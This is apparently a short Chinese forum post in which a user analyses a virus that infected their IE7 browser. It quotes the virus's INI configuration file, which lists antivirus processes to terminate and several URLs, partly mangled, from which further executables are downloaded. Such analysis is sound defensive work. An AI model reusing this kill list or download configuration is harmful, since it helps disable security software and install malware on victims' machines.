IE7的安全级已经被我调整成最好了
而且手写了个补丁
估计素差不多了 核心部分也分析出来了
由于病毒用的是INI..
很弱智的
GetKeyboardType 病毒调用了这个函数
NewInfo.bak 这个是新发现的..第二次中的时候看到的
第一次在IE文件夹下
[DOWNKILLLIST]
killproc1=avp.EXE
killproc2=rav.EXE
killproc3=kav.EXE
killproc4=kavsvc.EXE
killproc5=NAVAPSVC.EXE
自动反杀毒软件
downfile1=http*://css.scriptt.in rver/mh.exe
downfile2=http*://css.scriptt.in rver/jh.exe
downfile3=http*://css.scriptt.in rver/wow.exe
downfile4=http*://css.scriptt.in rver .exe
downfile5=http*://css.scriptt.in rver/wl.exe
downfile6=http*://css.scriptt.in rver/wm.exe
这里是XX列表。. |